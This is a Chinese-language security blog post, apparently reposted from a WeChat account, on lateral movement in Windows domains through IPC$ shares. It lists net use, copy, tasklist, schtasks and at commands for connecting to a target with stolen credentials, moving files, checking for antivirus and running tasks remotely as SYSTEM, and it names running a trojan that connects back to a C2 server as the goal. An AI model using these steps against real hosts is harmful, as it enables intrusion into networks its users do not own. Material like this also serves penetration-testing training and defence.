什么是IPC
IPC(Internet Process Connection)是共享”命令管道”的资源,为了让进程间通信而开放的命令管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。
IPC利用条件
开启139、445端口
管理员开启了默认共享(默认共享是为了方便管理员进行远程管理而默认开启的,包括所有的逻辑盘,和系统目录winnt或Windows(admin$)。通过ipc$可以实现对这些默认共享目录的访问。)
获取目标主机的账号密码(hash)
IPC利用方法
通过建立ipc管道连接可以读取目标主机的目录、文件也可以上传下载文件,还可以通过定时任务命令执行上传到目标主机的木马上线到C2。
以下是IPC连接的常用命令:
建立IPC连接
net use \10.0.10.110 /u:balsecadministrator Admin@666
查看本机IPC连接情况
net use
删除IPC连接
net use \10.0.10.110 /de /y
查看目标共享资源
net view \10.0.10.110
列出目标下C盘资源
dir \10.0.10.110c$
上传文件到目标机器C盘
copy .ip.txt \10.0.10.110c$
查看刚上传上去的文件内容
type \10.0.10.110c$pass.txt
下载目标机器文件到本机
copy \10.0.10.110c$a.txt .
列出目标主机的进程
tasklist /S 10.0.10.110 /U Administrator /P Admin@666这里可以看到目标机器有没有杀软
创建计划任务
St:
schtasks /create /tn test /U balsecadministrator /P Admin@666 /tr "cmd /c ipconfig > c:ipconfig.txt" /sc MINUTE /mo 1 /s 10.0.10.110 /RU system执行计划任务
schtasks /run /tn test /s 10.0.10.110 /U balsecadministrator /P Admin@666删除计划任务
schtasks /F /delete /tn test /s 10.0.10.110 /U balsecadministrator /P Admin@666at:
使用at前需要建立IPC连接
执行命令
at \10.10.10.8 11:40AM cmd /c "ipconfig > c:i.txt"清除记录
at \10.10.10.8 作业ID /delete
关于我们
群内不定期更新各种POC
点分享
点收藏
点在看
点点赞
原文始发于微信公众号(道一安全):域内横向总结系列-IPC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论